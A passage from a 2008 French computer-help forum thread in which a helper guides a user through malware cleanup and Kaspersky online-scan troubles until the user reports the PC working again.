 NOTE : Si tu reçois le message "La licence de Kaspersky On-line Scanner est périmée", va dans Ajout/Suppression de programmes puis désinstalle On-Line Scanner, reconnecte toi sur le site de Kaspersky pour retenter le scan en ligne.

 ;)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 12/11/2008 à 13:13:06  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 

  oups comment lancer internet explorer en tant que administrateur

merci

  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 12/11/2008 à 14:24:32  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
pas besoin, c'est que pour windows vista ;)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
(Publicité)
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 12/11/2008 à 15:26:19  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bon ben c'est pas gagné ,malgrés plusieurs essaies et l'aide , kaspersky ne s'installe pas

  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 12/11/2008 à 15:52:04  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
laisse tomber le scan en ligne ;)

 tu n'as plus de souci ? :)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 12/11/2008 à 17:01:40  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
non non plus de soucis ça a l'air de marcher un peu lent au démarrage mais c'est tout
 je te remercie beaucoup, ça n'a pas été facile :pt1cable:
 bonne fin de journée a toi et encore merci peut être à bientot :super:
 

naheulbeuk
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 13/11/2008 à 13:36:38  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bonjour, impossible

naheulbeuk
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 13/11/2008 à 13:50:48  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
j'ai oublié le trojan TJG2V2

 Page :
1

Aller à :
 

Sujets relatifs
internet lent [résolu] besoin de devenir administeur de mon PC
pc ralenti et fermeture du pc incontrolé ! PC inutilisable car ecran noir
pc infécté par cheval de troie Banker4 PC infecté
pb de pc qui rame... Page url inffecte par Mal/Iframe-F pc ralenti
Infection de mon PC (RESOLU) l'url em.pc on internet.com
Plus de sujets relatifs à : PC infesté de spywares(résolu)

Les 5 sujets de discussion précédents Nombre de réponses Dernier message
internet lent [résolu] 69
VIRUS 4 11
Gros Problème 3
un trojan trop difficile à éradiquer... 1
[resolu]Redirection vers des sites de pub 16